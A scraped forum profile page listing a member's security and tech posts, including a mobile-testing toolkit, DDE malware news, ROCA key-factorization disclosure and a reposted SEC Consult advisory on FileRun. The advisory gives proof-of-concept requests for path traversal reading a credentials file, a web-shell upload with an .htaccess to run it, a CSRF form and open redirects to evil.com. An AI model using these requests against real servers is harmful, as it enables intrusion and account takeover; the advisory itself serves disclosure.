Jump to content


Active Members
  • Content count

  • Joined

  • Last visited

  • Days Won


Fi8sVrs last won the day on October 20

Fi8sVrs had the most liked content!

Community Reputation

1096 Excellent

1 Follower

About Fi8sVrs

  • Rank

Recent Profile Visitors

2713 profile views
  1. Baraiala Sunet

    ce Windows utilizezi? placa de sunet? etc..
  2. Usage The service is used to generate QR-codes for strings in a UNIX/Linux console using curl/httpie/wget or similar tools. The service can be used in a browser also. Just add qrenco.de/ before the URL. The service uses libqrencode to generate QR-codes. Installation You don't need to install the service for using it (just try curl qrenco.de), but if you want to install it locally, do the following steps: $ git clone https://github.com/chubin/qrenco.de $ cd qrenco.de $ virtualenv ve $ ve/bin/pip install -r requirements.txt $ sudo apt-get install libqrenv $ ve/bin/python bin/srv.py If you want to use a HTTP-frontend for the service, configure it this way: server { listen 80; listen [::]:80; server_name qrenco.de *.qrenco.de; access_log /var/log/nginx/qrenco.de-access.log; error_log /var/log/nginx/qrenco.de-error.log; location / { proxy_pass; proxy_set_header Host $host; proxy_set_header X-Real-IP $remote_addr; proxy_set_header X-Forwarded-For $remote_addr; client_max_body_size 10m; client_body_buffer_size 128k; proxy_connect_timeout 90; proxy_send_timeout 90; proxy_read_timeout 90; proxy_buffer_size 4k; proxy_buffers 4 32k; proxy_busy_buffers_size 64k; proxy_temp_file_write_size 64k; expires off; } } Download: grenco.de-master.zip or git clone https://github.com/chubin/qrenco.de.git Sources: http://qrenco.de/ https://github.com/chubin/qrenco.de
  3. Embed for asciinema

    Cred ca ar fi util un Embed pentru https://asciinema.org/ in special in sectiunea Tutoriale
  4. objection Runtime Mobile Exploration, powered by Frida. introduction objection is a runtime mobile exploration toolkit, powered by Frida. It was built with the aim of helping assess mobile applications and their security posture without the need for a jailbroken or rooted mobile device. The project's name quite literally explains the approach as well, whereby runtime specific objects are injected into a running process and executed using Frida. Note: This is not some form of jailbreak / root bypass. By using objection, you are still limited by all of the restrictions imposed by the applicable sandbox you are facing. features Supporting both iOS and Android and having new features and improvements added regularly as the tool is used in real world scenarios, the following is a short list of only a few key features: For all supported platforms, objection allows you to: Patch iOS and Android applications, embedding a Frida gadget that can be used with objection or just Frida itself. Interact with the filesystem, listing entries as well as upload & download files where permitted. Perform various memory related tasks, such as listing loaded modules and their respective exports. Attempt to bypass and simulate jailbroken or rooted environments. Discover loaded classes and list their respective methods. Perform common SSL pinning bypasses. Dynamically dump arguments from methods called as you use the target application. Interact with SQLite databases inline without the need to download the targeted database and use an external tool. Execute custom Frida scripts. iOS specific features in objection include the ability to: Dump the iOS keychain, and export it to a file. Dump data from common storage such as NSUserDefaults and the shared NSHTTPCookieStorage. Dump various formats of information in human readable forms. Bypass certain forms of TouchID restrictions. Watch for method executions by targeting all methods in a class, or just a single method. Monitor the iOS pasteboard. Dump encoded .plist files in a human readable format without relying on external parsers. Android specific features in objection include the ability to: List the applications Activities, Services and Broadcast receivers. Start arbitrary Activities available in the target application. Watch a class method, reporting execution as it happens. screenshots The following screenshots show the main objection repl, connected to a test application on both an iPad running iOS 10.2.1, and Samsung Galaxy S5 running Android 6. A file system listing of the iOS applications main bundle A file system listing of the Android applications bundle iOS Keychain dumped for the current application, and later written to a file called keychain.json Inline SQLite query tool SSL Pinning bypass running for an iOS application SSL Pinning bypass running for an Android application sample usage A sample session, where objection version 0.1 is used to explore the applications environment. Newer versions have the REPL prompt set to the current applications name, however usage has remained the same: https://asciinema.org/a/8O6fjDHOdVKgPYeqITHXPp6HV prerequisites To run objection, all you need is the python3 interpreter to be available. Installation via pip should take care of all of the dependencies needed. For more details, please see the prerequisites section on the project wiki. As for the target mobile applications though, for iOS, an unencrypted IPA is needed and Android just the normal APK should be fine. If you have the source code of the iOS application you want to explore, then you can simply embed and load the FridaGadget.dylib from within the Xcode project. installation Installation is simply a matter of pip3 install objection. This will give you the objection command. For more detailed update and installation instructions, please refer to the wiki page here. powered by license Objection is licensed under a Creative Commons Attribution-NonCommercial-ShareAlike 4.0 International License Permissions beyond the scope of this license may be available at http://sensepost.com/contact/ Download: objection-master.zip or git clone https://github.com/sensepost/objection.git Source: https://github.com/sensepost/objection
  5. A newly discovered unpatched attacking method that exploits a built-in feature of Microsoft Office is currently being used in various widespread malware attack campaigns. Last week we reported how hackers could leveraging an old Microsoft Office feature called Dynamic Data Exchange (DDE), to perform malicious code execution on the targeted device without requiring Macros enabled or memory corruption. DDE protocol is one of the several methods that Microsoft uses to allow two running applications to share the same data. The protocol is being used by thousands of apps, including MS Excel, MS Word, Quattro Pro, and Visual Basic for one-time data transfers and for continuous exchanges for sending updates to one another. The DDE exploitation technique displays no "security" warnings to victims, except asking them if they want to execute the application specified in the command—although this popup alert could also be eliminated "with proper syntax modification." Soon after the details of DDE attack technique went public, Cisco's Talos threat research group published a report about an attack campaign actively exploiting this attack technique in the wild to target several organisations with a fileless remote access trojan (RAT) called DNSMessenger. Necurs Botnet Using DDE Attack to Spread Locky Ransomware Now, hackers have been found using the Necurs Botnet—malware that currently controls over 6 million infected computers worldwide and sends millions of emails—to distribute Locky ransomware and TrickBot banking trojan using Word documents that leverage the newly discovered DDE attack technique, reported SANS ISC. Locky ransomware hackers previously relied on macros-based booby-trapped MS Office documents, but now they have updated the Nercus Botnet to deliver malware via the DDE exploit and gain an ability to take screenshots of the desktops of victims. Hancitor Malware Using DDE Attack Another separate malware spam campaign discovered by security researchers has also been found distributing Hancitor malware (also known as Chanitor and Tordal) using Microsoft Office DDE exploit. Hancitor is a downloader that installs malicious payloads like Banking Trojans, data theft malware and Ransomware on infected machines and is usually delivered as a macro-enabled MS Office document in phishing emails. How to Protect Yourself From Word DDE Attacks? Since DDE is a Microsoft's legitimate feature, most antivirus solutions do not flag any warning or block MS Office documents with DDE fields, neither the tech company has any plans of issuing a patch that would remove its functionality. So, you can protect yourself and your organisation from such attacks by disabling the "update automatic links at open" option in the MS Office programs. To do so, Open Word → Select File → Options → Advanced and scroll down to General and then uncheck "Update Automatic links at Open." However, the best way to protect yourself from such attacks is always to be suspicious of any uninvited document sent via an email and never click on links inside those documents unless adequately verifying the source. Via thehackernews.com
  6. VPN trial 30 days

    create coupon here: https://stacksocial.com/sales/perfect-privacy-vpn-30-day-free-trial and add here: https://www.perfect-privacy.com/german/coupon/?a_aid=stacksocial Offer ending in: 6 days Enjoy!
  7. https://wellcode.ro/ - Învață programare de la zero Începe să înveți în ritmul tău Fă-ți un cont gratuit și învață să scrii cod de calitate. Vom fi acolo să te ajutăm când ai nevoie. Content: Introducere C++ IDE Tutorial pentru instalarea CodeBlocks Hello world Evaluarea problemelor Afișare Variabile Tipul de date pentru numere întregi Atribuirea valorilor Citirea de la tastatură a variabilelor Afișarea variabilelor Operatori Adunare Calcul Operatori - II Like If - Structura de decizie Structura instrucțiunii if Condiții compuse FizzBuzz If inlănțuit Else Maxim Else if Crescator 3 Comentarii While - Structura repetitivă I While - Cum funcționează Studiu de caz - Numărul de cifre ale unui număr ABC Studiu de caz - concatenarea a două numere Inversul unui număr Înlănțuirea instrucțiunilor Studiu de caz - Verificarea primalității unui număr Triunghi For - Structura repetitivă II Minimul și maximul a N numere Înmulțire Al x-lea număr prim Șiruri de numere Accesarea și modificarea elementelor unui șir Șiruri de numere - Citire și Afișare Modificare șir Șiruri de numere - Studiu de caz - I Adăugarea unui element în șir Ștergerea unui element din șir Afișarea elementelor pare în ordine inversă Afișare elemente pare și impare Sortarea unui șir de numere Matrice - Tablouri bidimensionale Aplicații în viața reală Citirea și Afișarea Matricilor Studiu de caz - transpusa unei matrice Ștergerea unei linii dintr-o matrice Ștergerea unei coloane dintr-o matrice Matrice patratice Parcurgerea diagonalelor unei matrice pătratice Șiruri de numere - II Şiruri de frecvenţă Căutare binară - Descrierea ideii Căutare binară - implementare Bubble sort Sortare prin numărare https://wellcode.ro/ Sursa: ProTV
  8. Afian AB FileRun version 2017.03.18 suffers from cross site request forgery, cross site scripting, open redirection, remote shell upload, and various other vulnerabilities. SEC Consult Vulnerability Lab Security Advisory < 20171018-0 > ======================================================================= title: Multiple vulnerabilities product: Afian AB FileRun vulnerable version: 2017.03.18 fixed version: 2017.09.18 impact: critical homepage: https://www.filerun.com | https://afian.se found: 2017-08-28 by: Roman Ferdigg (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "FileRun File Manager: access your files anywhere through self-hosted secure cloud storage, file backup and sharing for your photos, videos, files and more. Upload and download large files for easy sharing. Google Drive self-hosted alternative." Source: https://www.filerun.com Business recommendation: ------------------------ By exploiting the vulnerabilities documented in this advisory, an attacker can compromise the web server which has FileRun installed. User files might get exposed through this attack. SEC Consult recommends not to use FileRun until a thorough security review has been performed by security professionals and all identified issues have been resolved. Vulnerability overview/description: ----------------------------------- 1) Path Manipulation When uploading, downloading or viewing files, FileRun uses a parameter to specify the path on the file-system. An attacker can manipulate the value of this parameter to read, create and even overwrite files in certain folders. An attacker could upload malicious files to compromise the webserver. In combination with the open redirect and CSRF vulnerability even an unauthenticated attacker can upload these files to get a shell. Through the shell all user files can be accessed. 2) Stored Cross Site Scripting (XSS) via File Upload The application allows users to upload different file types. It is also possible to upload HTML files or to create them via the application's text editor. Files can be shared using a link or within the FileRun application (in the enterprise version). An attacker can inject JavaScript in HTML files to attack other users or simply create a phishing site to steal user credentials. Remark: In the standard configuration of the FileRun docker image the HttpOnly cookie flag is not set, which means that authentication cookies can be accessed in an XSS attack. This allows easy session hijacking as well. 3) Cross Site Request Forgery (CSRF) The application does not implement CSRF protection. An attacker can exploit this vulnerability to execute arbitrary requests with the privileges of the victim. The only requirement is that a victim visits a malicious webpage. Such a page could be hosted on the FileRun server itself and shared with other users as described in vulnerability 2. Besides others, the following actions can be performed via CSRF if the victim has administrative privileges: - Create or delete users - Change permissions rights of users - Change user passwords If the victim has no administrative privileges, for example the following actions can be performed: - Upload files - Change the email address (for password recovery) 4) Open Redirect Vulnerabilities An open redirect vulnerability in the login and logout pages allows an attacker to redirect users to arbitrary web sites. The redirection host could be used for phishing attacks (e.g. to steal user credentials) or for running browser exploits to infect a victim's machine with malware. The open redirect in the login page could also be used to exploit CSRF (see above). Because the server name in the manipulated link is identical to the original site, phishing attempts may have a more trustworthy appearance. Proof of concept: ----------------- 1) Path Manipulation The URL below is used to read the application file "autoconfig.php", which contains the username and cleartext password of the database. URL: http://$DOMAIN/?module=custom_actions&action=open_in_browser&path=/var/www/html/system/data/autoconfig.php This post request is used to upload a PHP shell in the writable folder avatars: POST /?module=fileman_myfiles&section=ajax&page=up HTTP/1.1 Host: $DOMAIN [...] Content-Type: multipart/form-data; boundary=---------------------------293712729522107 Cookie: FileRunSID=t5h7lm99r1ff0quhsajcudh7t0; language=english DNT: 1 Connection: close -----------------------------293712729522107 Content-Disposition: form-data; name="flowTotalSize" 150 -----------------------------293712729522107 Content-Disposition: form-data; name="flowIsFirstChunk" 1 -----------------------------293712729522107 Content-Disposition: form-data; name="flowIsLastChunk" 1 -----------------------------293712729522107 Content-Disposition: form-data; name="flowFilename" shell.php -----------------------------293712729522107 Content-Disposition: form-data; name="path" /var/www/html/system/data/avatars/ -----------------------------293712729522107 Content-Disposition: form-data; name="file"; filename="shell.php" Content-Type: application/octet-stream *web shell payload here* -----------------------------293712729522107-- To execute the uploaded shell a .htaccess file with the contents below can be uploaded in the same folder. Content of .htaccess file: <Files "*"> Order allow,deny Allow from all </Files> The uploaded shell can be accessed by the following URL: http://$DOMAIN/?module=custom_actions&action=open_in_browser&path=/var/www/html/system/data/avatars/shell.php 2) Stored Cross Site Scripting (XSS) via File Upload An HTML file with JavaScript code can be easily uploaded to attack other users. No PoC necessary. 3) Cross Site Request Forgery An example for a CSRF attack would be the following request which changes the email address of the victim: <html> <body> <form action="http://$DOMAIN/?module=fileman&section=profile&action=save" method="POST"> <input type="hidden" name="receive&#95;notifications" value="0" /> <input type="hidden" name="two&#95;step&#95;enabled" value="0" /> <input type="hidden" name="name" value="User" /> <input type="hidden" name="name2" value="A" /> <input type="hidden" name="email" value="newemail&#64;example&#46;com" /> <input type="hidden" name="ext&#45;comp&#45;1009" value="on" /> <input type="hidden" name="current&#95;password" value="" /> <input type="hidden" name="new&#95;password" value="" /> <input type="hidden" name="confirm&#95;new&#95;password" value="" /> <input type="submit" value="Submit request" /> </form> </body> </html> The new email address can be used by the attacker to reset the password of the victim. 4) Open Redirect Vulnerabilites The URL below can be used to forward a user to an arbitrary website after the login: http://$DOMAIN/?redirectAfterLogin=aHR0cDovL3d3dy5ldmlsLmNvbQ== The value of the redirect parameter needs to be base64 encoded. To redirect a user after logout, following URL can be used: http://$DOMAIN/?module=fileman&page=logout&redirect=http://evil.com In this case for a successful exploit, the victim has to be logged in. Vulnerable / tested versions: ----------------------------- The regular version of FileRun 2017.03.18 has been tested. It is assumed earlier versions of FileRun are also vulnerable to the issues. Vendor contact timeline: ------------------------ 2017-08-31: Contacting vendor through info@afian.se, info@filerun.com 2017-09-01: Sending unencrypted advisory as requested by vendor 2017-09-04: FileRun fixed the vulnerability "Path Manipulation" 2017-09-12: Requesting a status update 2017-09-13: FileRun informed us that a patch for all vulnerabilities will be released before 2017-09-20 2017-09-16: Patch available 2017-10-18: Public release of security advisory Solution: --------- Update to the latest version available (see https://docs.filerun.com/updating). According to FileRun, all the vulnerabilities are fixed in release 2017.09.18 or higher. For further information see: https://www.filerun.com/changelog Workaround: ----------- No workaround available. Advisory URL: ------------- https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult Bangkok - Berlin - Linz - Luxembourg - Montreal - Moscow Kuala Lumpur - Singapore - Vienna (HQ) - Vilnius - Zurich About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/en/career/index.html Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/en/contact/index.html ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: research at sec-consult dot com Web: https://www.sec-consult.com Blog: http://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF Roman Ferdigg / @2017 Site sec-consult.com
  9. A suite of utilities simplilfying linux networking stack performance troubleshooting and tuning. https://pypi.python.org/pypi/netutils-linux netutils-linux It's a useful utils to simplify Linux network troubleshooting and performance tuning, developed in order to help Carbon Reductor techsupport and automate the whole linux performance tuning process out of box (ok, except the best RSS layout detection with multiple network devices). These utils may be useful for datacenters and internet service providers with heavy network workload (you probably wouldn't see an effect at your desktop computer). It's now in production usage with 300+ deployment and save us a lot of time with hardware and software settings debugging. Inspired by packagecloud's blog post. Installation You'll need pip. pip install netutils-linux Utils Monitoring All these top-like utils don't require root priveledges or sudo usage. So you can install and use them as non-priveledged user if you care about security. pip install --user netutils-linux Brief explanation about highlighting colors for CPU and device groups: green and red are for NUMA-nodes, blue and yellow for CPU sockets. Screenshots are taken from different hosts with different hardware. network-top Most useful util in this repo that includes almost all linux network stack performance metrics and allow to monitor interrupts, soft interrupts, network processing statistic for devices and CPUs. Based on following files: /proc/interrupts (vectors with small amount of irqs/second are hidden by default) /proc/net/softnet_stat - packet distribution and errors/squeeze rate between CPUs. /proc/softirqs (only NET_RX and NET_TX values). /sys/class/net/<NET_DEVICE>/statistic/<METRIC> files (you can specify units, mbits are default) There are also separate utils if you want to look at only specific metrics: irqtop, softirq-top, softnet-stat-top, link-rate. snmptop Basic /proc/net/smmp file watcher. Tuning rss-ladder Automatically set smp_affinity_list for IRQ of NIC rx/tx queues that usually work on CPU0 out of the box). Based on lscpu's output. It also supports double/quad ladder in case of multiprocessor systems (but you better explicitly specify queue count == core per socket as NIC's driver's param). Example output: # rss-ladder eth1 0 - distributing interrupts of eth1 (-TxRx-) on socket 0 - eth1: irq 67 eth1-TxRx-0 -> 0 - eth1: irq 68 eth1-TxRx-1 -> 1 - eth1: irq 69 eth1-TxRx-2 -> 2 - eth1: irq 70 eth1-TxRx-3 -> 3 - eth1: irq 71 eth1-TxRx-4 -> 8 - eth1: irq 72 eth1-TxRx-5 -> 9 - eth1: irq 73 eth1-TxRx-6 -> 10 - eth1: irq 74 eth1-TxRx-7 -> 11 autorps Enables RPS on all available CPUs of NUMA node local for the NIC for all NIC's rx queues. It may be good for small servers with cheap network cards. You also can explicitely pass --cpus or --cpu-mask. Example output: # autorps eth0 Using mask 'fc0' for eth0-rx-0. maximize-cpu-freq Sets every CPU scaling governor mode to performance and set max scaling value for min scaling value. So you will be able to use all power of your processor (useful for latency sensible systems). rx-buffers-increase rx-buffers-increase utils, that finds and sets compromise-value between avoiding dropped/missing pkts and keeping a latency low. Example output: # ethtool -g eth1 Ring parameters for eth1: Pre-set maximums: RX: 4096 ... Current hardware settings: RX: 256 # rx-buffers-increase eth1 run: ethtool -G eth1 rx 2048 # rx-buffers-increase eth1 eth1's rx ring buffer already has fine size. # ethtool -g eth1 Ring parameters for eth1: Pre-set maximums: RX: 4096 ... Current hardware settings: RX: 2048 Hardware and its configuration rating server-info Much alike lshw but designed for network processing role of server. # server-info show cpu: info: Architecture: x86_64 BogoMIPS: 6799.9899999999998 Byte Order: Little Endian CPU MHz: 3399.998 CPU family: 6 CPU op-mode(s): 32-bit, 64-bit CPU(s): 2 Core(s) per socket: 1 Hypervisor vendor: KVM L1d cache: 32K L1i cache: 32K L2 cache: 4096K Model: 13 Model name: QEMU Virtual CPU version (cpu64-rhel6) NUMA node(s): 1 NUMA node0 CPU(s): 0,1 On-line CPU(s) list: 0,1 Socket(s): 2 Stepping: 3 Thread(s) per core: 1 Vendor ID: GenuineIntel Virtualization type: full layout: '0': '0' '1': '1' disk: sr0: model: QEMU DVD-ROM vda: model: null size: 64424509440 type: HDD memory: MemFree: 158932 MemTotal: 1922096 SwapFree: 4128764 SwapTotal: 4128764 net: eth1: buffers: cur: 2048 max: 4096 conf: ip: vlan: true driver: driver: e1000 version: 7.3.21-k8-NAPI queues: own: [] rx: [] rxtx: [] shared: - virtio1, eth0, eth1 tx: [] unknown: [] It also can rate hardware and its features in range of 1..10. # server-info rate cpu: BogoMIPS: 7 CPU MHz: 7 CPU(s): 1 Core(s) per socket: 1 L3 cache: 1 Socket(s): 10 Thread(s) per core: 10 Vendor ID: 10 disk: sr0: size: 1 type: 2 vda: size: 1 type: 1 memory: MemTotal: 1 SwapTotal: 10 net: eth1: buffers: cur: 5 max: 10 driver: 1 queues: 1 system: Hypervisor vendor: 1 Virtualization type: 1 Download: netutils-linux-master.zip or: git clone https://github.com/strizhechenko/netutils-linux.git Source: https://github.com/strizhechenko/netutils-linux
  10. Sysadmins and developers rejoice! WSL is now a fully fledged part of Windows 10, starting with the latest Fall Creators Update. terested in running Linux on Windows 10 with Windows Subsystem for Linux (WSL), but nervous about it being both a beta and only available in Windows 10 developer mode? Your worries are over. In the Windows 10 Fall Creators Update (WinFCU) WSL has graduated to being a Windows 10 feature that can be run by any user. Tested for over a year, WSL on WinFCU is bringing many new features to this combination of the Linux Bash shell and Windows. Besides WSL no longer being a beta or requiring users to be in developer mode, the new features include: Install Linux distros via the Windows Store WSL now runs multiple Linux distros WSL comes to Windows Server & Microsoft Azure VMs WSL now supports USB/serial comms Miscellaneous fixes and improvements Besides Ubuntu, the new WSL-supported Linux distros are SUSE's community openSUSE and its corporate SUSE Linux Enterprise Server (SLES). Fedora and other distros will arrive in the store shortly. If you've previously installed WS, your existing "legacy" Ubuntu instance will continue to work, but it's deprecated. To continue to receive support you should replace it with a new store-delivered instance. Without this, you won't receive Canonical or Microsoft support. To keep your old files, you should tar them and copy them to your Windows file system; for example: `/mnt/c/temp/backups` and then copy them back to your new instance. In addition, instead of jumping through hoops to install Linux on Windows, you can install one or more -- yes, you can have multiple distros on a single Windows 10 system -- Linux distros from the Windows Store. To do this, you must first enable the WSL feature in the "Turn Windows Features on or off" dialog and reboot. No, WSL is not active by default and yes, you must reboot. After rebooting you simply search for "Linux" in the Windows Store, pick a version to install, hit install, and in a few minutes you're good to go. If you already have a Bash instance installed on WSL, you can start afresh with the lxrun /uninstall command. You run this command from the command prompt or PowerShell. Besides being able to install multiple Linux distributions, you can simultaneously run one or more Linux distros. Each distro runs independently of one another. These are neither virtual machines (VMs) nor containers, and that means they need their usual system resources. I, for example, would only want them on systems with at least an additional 2GBs per instance of running WSL. WSL itself requires only minimal system resources. Rich Turner, Microsoft's senior program manager of WSL and Windows Console, wrote: "We don't list [RAM requirements] because, frankly, we don't have any of note! If you don't install WSL, we add no RAM footprint. If you do enable WSL, there's a tiny 850KB driver loaded briefly, and then it shuts down until you start a Linux instance. At that point, you load /init which launches /bin/bash. This causes the 850KB driver to load, and creates Pico Processes for init and bash. So, basically, WSL's RAM requirements are pretty much whatever the RAM is that you need to run each Linux binary, plus around 1MB of working set in total." The Linux distros can also access Windows' host filesystem, networking stack, etc. That means you should be cautious about changing files on the Windows filesystem. Why would you run multiple distros at once? Microsoft points out: You can now install Linux distros right from the Windows Store. Linux developers will be pleased to find that USB serial comms are now supported. This enables your shell scripts and apps to talk to serial ports. WSL also now supports mounting of USB-attached storage devices and network shares. That's the good news, The bad news is it only supports the NT filesystem IO infrastructure. In other words it only supports FAT/FAT32/NTFS formatted storage devices. Want *nix file systems? Microsoft encourages you to upvote and/or comment on the associated UserVoice ask. Digging deeper into the new improvements, under the hood WSL on WinFCU now includes: Improved TCP socket options inc. IP_OPTIONS, IP_ADD_MEMBERSHIP, IP_MULTICAST, etc /etc/hosts will now inherit entries from the Windows hosts file xattr related syscalls support Fixed several filesystem features and capabilities Improved PTRACE support Improved FUTEX support chsh, which enables you to change shells, now works. This enables you to use your favorite shell directly. Shell startup file other than ".bashrc" will now execute. The following syscalls were added for the first time during the FCU cycle: Prlimit64 getxattr, setxattr, listxattr, removexattr As expected, WSL is also on its way to Windows Server and to Microsoft Azure Windows VM instances. This will make WSL even more useful for sysadmins. All these improvements have made it even easier for developers and system administrators to run Linux shell commands on Windows. While this isn't very useful for ordinary desktop users, for serious IT staff it's a real step forward, making Windows more useful in a server and cloud world that's increasingly dominated by Linux. Even on Azure, over a third of VMs are Linux. With WSL, most Linux shell tools are at your command. These include: apt, ssh, find, grep, awk, sed, gpg, wget, tar, vim, emacs, diff, and patch. You can also run popular open-source programming languages such as python, perl, ruby, php, and gcc. In addition, WSL and Bash supports server programs such as the Apache web-server and Oracle's MySQL database management system. In other words, you get a capable Linux development environment running on Windows. While you can run Linux graphical interfaces and programs on WSL, it's more of a stunt than a practical approach at this time. Of course, with a little work... How does WSL work? Dustin Kirkland, a member of Canonical's Ubuntu Product and Strategy executive team, explained: "We're talking about bit-for-bit, checksum-for-checksum Ubuntu ELF binaries running directly in Windows. [WSL] basically perform real-time translation of Linux syscalls into Windows OS syscalls. Linux geeks can think of it sort of the inverse of 'WINE' -- Ubuntu binaries running natively in Windows." Regardless of the technical details of how WSL does what it doess, what matters now is that WSL works very, very well. Enjoy! Via zdnet.com
  11. A newly discovered vulnerability in generation of RSA keys used by a software library adopted in cryptographic smartcards, security tokens and other secure hardware chips manufactured by Infineon Technologies AG allows for a practical factorization attack, in which the attacker computes the private part of an RSA key. The attack is feasible for commonly used key lengths, including 1024 and 2048 bits, and affects chips manufactured as early as 2012, that are now commonplace. Assess your keys now with the provided offline and online detection tools and contact your vendor if you are affected. Major vendors including Microsoft, Google, HP, Lenovo, Fujitsu already released the software updates and guidelines for a mitigation. Full details including the factorization method will be released in 2 weeks at the ACM CCS conference as 'The Return of Coppersmith's Attack: Practical Factorization of Widely Used RSA Moduli' (ROCA) research paper. Description of the vulnerability A security vulnerability was found in the implementation of RSA keypair generation in a cryptographic library used in a wide range of cryptographic chips produced by Infineon Technologies AG. The product is also integrated in authentication, signature and encryption tokens of other vendors and chips used for Trusted Boot of operating systems. The vulnerability is present in NIST FIPS 140-2 and CC EAL 5+ certified devices since at least the year 2012. The algorithmic vulnerability is characterized by a specific structure of the generated RSA primes, which makes factorization of commonly used key lengths including 1024 and 2048 bits practically possible. Only the knowledge of a public key is necessary and no physical access to the vulnerable device is required. The vulnerability does NOT depend on a weak or a faulty random number generator - all RSA keys generated by a vulnerable chip are impacted. The attack was practically verified for several randomly selected 1024-bit RSA keys and for several selected 2048-bit keys. The specific structure of the primes in question allows for a fast detection of vulnerable keys, even in very large datasets. This property is useful for mitigation (users can assess own keys for vulnerability), but also for potential attackers (keys vulnerable to factorization can be pre-selected, without undergoing time-consuming factorization attempts). The worst cases for the factorization of 1024 and 2048-bit keys are less than 3 CPU-months and 100 CPU-years, respectively, on a single core of a common recent CPU, while the expected time is half of that of the worst case. The factorization can be easily parallelized on multiple CPUs. Where k CPUs are available, the wall time required for the attack will be reduced k-times - allowing for practical factorization in order of hours or days. The worst-case price of the factorization on an Amazon AWS c4 computation instance is $76 for the 1024-bit key and about $40,000 for the 2048-bit key. The difficulty of the factorization attack is not the same for all key lengths and is NOT strictly increasing (some longer keys may take less time to factorize than other shorter ones). The following key length ranges are now considered practically factorizable (time complexity between hours to 1000 CPU years at maximum): 512 to 704 bits, 992 to 1216 bits and 1984 to 2144 bits. Note that 4096-bit RSA key is not practically factorizable now, but may become so, if the attack is improved. The time complexity and cost for the selected key lengths (Intel E5-2650 v3@3GHz Q2/2014): 512 bit RSA keys - 2 CPU hours (the cost of $0.06); 1024 bit RSA keys – 97 CPU days (the cost of $40-$80); 2048 bit RSA keys – 140.8 CPU years, (the cost of $20,000 - $40,000). The vulnerability was found by a close inspection of a large number of RSA keys generated and exported from the manufacturer smartcards by researchers at CRoCS laboratory, Masaryk University, Enigma Bridge and Ca' Foscari University. The full results will be presented at an academic ACM Conference on Computer and Communications Security (ACM CCS '17) starting from October 30th. The vulnerability was disclosed to Infineon Technologies AG, following the responsible disclosure principle, in the first week of February with agreement of an 8 month period before a public disclosure. We cooperated with the manufacturer and other affected parties to help evaluate and mitigate this vulnerability during this period. Major vendors including Microsoft, Google, HP, Lenovo, Fujitsu already released the software updates and guidelines for a mitigation. We are now notifying general public and releasing tools for assessmnet of the individual keys. Impact A remote attacker can compute an RSA private key from the value of a public key. The private key can be misused for impersonation of a legitimate owner, decryption of sensitive messages, forgery of signatures (such as for software releases) and other related attacks. The actual impact of the vulnerability depends on the usage scenario, availability of the public keys and the lengths of keys used. We found and analyzed vulnerable keys in various domains including electronic citizen documents, authentication tokens, trusted boot devices, software package signing, TLS/HTTPS keys and PGP. The currently confirmed number of vulnerable keys found is about 760,000 but possibly up to two to three magnitudes more are vulnerable. The details will be presented in two weeks at the ACM CCS conference. The vulnerable chips are pervasive and not necessarily sold directly by Infineon Technologies AG, as the chips can be embedded inside devices of other manufacturers. Detection tools, mitigation and workarounds The first step is to detect if you use a chip with the vulnerable library. As the vulnerability is present in the on-chip software library and not limited just to a particular batch of hardware, the only reliable way is to generate an RSA keypair on the device and test the public key by the provided tools (see below). It is recommended to test also the keys already in use. We believe the tools are very accurate - it is highly unlikely that a secure key would be flagged, as well as that a vulnerable key would be missed. We provide the following tools: Offline testers: Python/Java/C++ applications and tutorials (https://github.com/crocs-muni/roca). We release all offline tools under the MIT license so it can be embedded into other testing applications and services. Online testers: Upload public key to https://keychest.net/roca or https://keytester.cryptosense.com to test your key. Email S-MIME/PGP tester: Send a signed email to roca@keychest.net to obtain an automatic email response with the analysis of the signing key vulnerability. If a vulnerable key is found, then you should contact your device vendor for further advice. The following general advices may apply: Apply the software update if available. Replace the device with one without the vulnerable library. Generate a secure RSA keypair outside the device (e.g., via the OpenSSL library) and import it to the device. We are not aware of any vulnerability in connection with the actual use of the key, only the generation phase has a confirmed vulnerability. Use other cryptographic algorithm (e.g., ECC) instead of RSA on affected devices. Apply additional risk management within your environment, if the RSA key in use is detected as vulnerable. Use key lengths which are not currently impacted (e.g., 3936 bits) by our factorization method. Be aware: use this specific mitigation only as a last resort, as the attack may be improved. Team The vulnerability was discovered by Slovak and Czech security researchers from the Centre for Research on Cryptography and Security at Masaryk University, Czech Republic; Enigma Bridge Ltd, Cambridge, UK; and Ca' Foscari University of Venice, Italy. Updates 2nd of November 2017 - Presentation of all details at the ACM CCS conference (to come) 16th of October 2017 - The initial version of the public disclosure published May to October 2017 - Cooperation with the manufacturer and other affected parties to help evaluate and mitigate the vulnerability 1st of February - The vulnerability disclosed to Infineon Technologies AG End of January - The vulnerability found Q&A Techincal references Infineon, Information on software update of RSA key generation function: https://www.infineon.com/RSA-update Infineon, Information on TPM firmware update for Microsoft Windows systems https://www.infineon.com/cms/en/product/promopages/tpm-update/?redirId=59160 Microsoft Vulnerability in TPM could allow Security Feature Bypass: https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/ADV170012 Google, The Chromium project Trusted Platform Module firmware vulnerability: https://sites.google.com/a/chromium.org/dev/chromium-os/tpm_firmware_update Media ArsTechnica: https://arstechnica.com/information-technology/2017/10/crypto-failure-cripples-millions-of-high-security-keys-750k-estonian-ids/ Forbes: 